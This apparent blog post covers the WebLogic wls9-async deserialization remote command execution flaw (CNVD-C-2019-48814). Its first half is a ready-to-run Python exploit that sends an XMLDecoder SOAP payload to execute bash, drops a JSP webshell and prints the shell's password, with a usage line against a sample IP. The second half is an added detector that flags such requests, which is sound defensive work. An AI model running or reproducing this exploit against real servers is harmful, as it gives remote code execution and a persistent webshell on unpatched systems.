  • CNVD-C-2019-48814 vulnerability

    CNVD-C-2019-48814

    WebLogic wls9-async deserialization remote command execution vulnerability (the same issue Oracle tracks as CVE-2019-2725)

    Detailed write-ups are available online (https://github.com/jas502n/CNVD-C-2019-48814)

    (https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961)

    Turn the published payload into a POC.

    Procedure: POST the payload to url + _async/AsyncResponseService, check the HTTP status (the async service answers 202 Accepted when it consumed the SOAP message), then GET the dropped JSP to check whether a shell was obtained.

    import sys
    import textwrap

    import requests


    def poc(url):
        # Normalise the base URL so "http://host:7001/" and "http://host:7001" both work.
        url = url.rstrip('/')
        path = "/_async/AsyncResponseService"
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",
            'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            'Content-Type': "text/xml",
        }
        # The WorkContext SOAP header is handed to java.beans.XMLDecoder, which builds a
        # ProcessBuilder and runs "bash -c <command>". The command decodes a base64-encoded
        # JSP (elided below) into the exploded wls9_async_response webapp so that it is
        # served under /_async/. The "8tpkys" directory name is specific to the target's
        # deployment and may have to be adjusted.
        payload = textwrap.dedent("""\
            <?xml version="1.0" encoding="Utf-8"?>
            <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
            <soapenv:Header>
            <wsa:Action>xx</wsa:Action>
            <wsa:RelatesTo>xx</wsa:RelatesTo>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.xmlDecoder">
            <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
            <void index="0">
            <string>bash</string>
            </void>
            <void index="1">
            <string>-c</string>
            </void>
            <void index="2">
            <string>echo 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|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string>
            </void>
            </array>
            <void method="start"/>
            </void>
            </java>
            </work:WorkContext>
            </soapenv:Header>
            <soapenv:Body>
            <asy:onAsyncDelivery/>
            </soapenv:Body>
            </soapenv:Envelope>
            """).strip()
        # dedent() + strip() matter: the <?xml ...?> declaration must be the very first
        # bytes of the body, otherwise the server's XML parser rejects the whole request
        # before the WorkContext header is ever looked at.
        try:
            request = requests.post(url + path, data=payload, headers=headers, timeout=10)
            print('[+] exploit url: %s%s' % (url, path))
            if request.status_code == 202:
                # 202 Accepted: the async service consumed the SOAP message.
                print('[+] %s  exploit success!' % url)
                request2 = requests.get(url + '/_async/shell.jsp', timeout=10)
                if request2.status_code == 200:
                    print('[+]   get shell: %s/_async/shell.jsp  pass is orange' % url)
                else:
                    print('[-]   get shell fail')
            else:
                print('[-] %s  exploit failed (HTTP %d)' % (url, request.status_code))
        except requests.RequestException as exc:
            print('[-] %s  address cannot connect (%s)' % (url, exc))


    if __name__ == '__main__':
        if len(sys.argv) != 2:
            print('usage: python CNVD-C-2019-48814.py http://target:7001/')
            sys.exit(1)
        poc(sys.argv[1])

    Attack:

    python CNVD-C-2019-48814.py http://111.111.111.111:7001/

    After a successful attack you get a webshell at /_async/shell.jsp; it takes its password via GET, and the password is orange.

    The test failed.
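    Added detection example, not code from the original post or from the linked repositories: given one HTTP request's method, path and body, it flags the WorkContext/XMLDecoder pattern that the payload above relies on. The sample requests are constructed here, and the endpoint list, class list and method list are my own choices. The body is parsed with ElementTree; because a body the XML parser rejects (for example one with whitespace in front of the `<?xml ...?>` declaration) must not slip through unexamined, the inspector falls back to plain string matching instead of failing open.

```python
import xml.etree.ElementTree as ET

# Namespace of the WorkContext SOAP header that WebLogic hands to XMLDecoder.
NS_WORK = "http://bea.com/2004/06/soap/workarea/"

# Endpoints that deserialise the WorkContext header (assumption: this page uses /_async/).
SUSPECT_PATHS = ("/_async/", "/wls-wsat/")

# Classes that have no business inside a WorkContext document (assumed list).
DANGEROUS_CLASSES = ("java.lang.ProcessBuilder", "java.lang.Runtime")

# Methods the public payloads invoke to run the command (assumed list).
DANGEROUS_METHODS = ("start", "exec")


def _inspect_java_tree(java_el, findings):
    """Walk a parsed <java> document and record exploit indicators."""
    # Case-insensitive: public payloads spell the class both XMLDecoder and xmlDecoder.
    if "xmldecoder" in java_el.get("class", "").lower():
        findings.append(("alert", "XMLDecoder document inside WorkContext"))
    for el in java_el.iter():
        cls = el.get("class", "")
        if cls in DANGEROUS_CLASSES:
            findings.append(("alert", "class attribute references " + cls))
        if el.tag == "void" and el.get("method") in DANGEROUS_METHODS:
            findings.append(("alert", "void method=%s invocation" % el.get("method")))


def _inspect_raw(body, reason, findings):
    """Fallback for bodies the XML parser rejects: plain substring checks."""
    findings.append(("info", "unparseable body: " + reason))
    lowered = body.lower()
    if "workcontext" in lowered and "xmldecoder" in lowered:
        findings.append(("alert", "WorkContext and XMLDecoder markers in raw body"))
    for cls in DANGEROUS_CLASSES:
        if cls.lower() in lowered:
            findings.append(("alert", "raw body references " + cls))


def inspect_request(method, path, body):
    """Return [(level, message), ...] for one HTTP request; [] if nothing matched."""
    findings = []
    if method.upper() != "POST" or not path.startswith(SUSPECT_PATHS):
        return findings
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        # Never fail open: a body the parser rejects still gets string matching.
        _inspect_raw(body, str(exc), findings)
        return findings
    for wc in root.iter("{%s}WorkContext" % NS_WORK):
        findings.append(("info", "WorkContext header present on " + path))
        for java_el in wc.iter("java"):
            _inspect_java_tree(java_el, findings)
    return findings


def is_exploit_attempt(method, path, body):
    """True when at least one alert-level indicator was found."""
    return any(level == "alert" for level, _ in inspect_request(method, path, body))


def build_sample_payload(command, leading_whitespace=False):
    """Constructed sample mirroring the page's payload shape, with a harmless command."""
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:wsa="http://www.w3.org/2005/08/addressing" '
        'xmlns:asy="http://www.bea.com/async/AsyncResponseService">'
        '<soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo>'
        '<work:WorkContext xmlns:work="%s">'
        '<java version="1.8.0_131" class="java.beans.XMLDecoder">'
        '<void class="java.lang.ProcessBuilder">'
        '<array class="java.lang.String" length="3">'
        '<void index="0"><string>bash</string></void>'
        '<void index="1"><string>-c</string></void>'
        '<void index="2"><string>%s</string></void>'
        '</array><void method="start"/></void></java></work:WorkContext>'
        '</soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>'
        '</soapenv:Envelope>' % (NS_WORK, command)
    )
    # Whitespace before the declaration reproduces the defect a strict XML parser rejects.
    return "\n        " + xml if leading_whitespace else xml


# Constructed benign request to the same endpoint: no WorkContext header at all.
BENIGN_BODY = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
               'xmlns:asy="http://www.bea.com/async/AsyncResponseService">'
               '<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>')

if __name__ == "__main__":
    samples = [
        ("GET", "/console/login/LoginForm.jsp", ""),
        ("POST", "/_async/AsyncResponseService", BENIGN_BODY),
        ("POST", "/_async/AsyncResponseService", build_sample_payload("id")),
        ("POST", "/_async/AsyncResponseService", build_sample_payload("id", leading_whitespace=True)),
    ]
    for method, path, body in samples:
        print(method, path, "exploit" if is_exploit_attempt(method, path, body) else "clean")
        for level, msg in inspect_request(method, path, body):
            print("   ", level, msg)
```

    Run it as-is to see the four constructed requests classified; the two "info" entries (a WorkContext header being present, a body that did not parse) are deliberately not alerts on their own, so that a legitimate async response with a WorkContext header is not flagged while a malformed body still gets the substring checks.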

  • Original article: https://www.cnblogs.com/Oran9e/p/10772713.html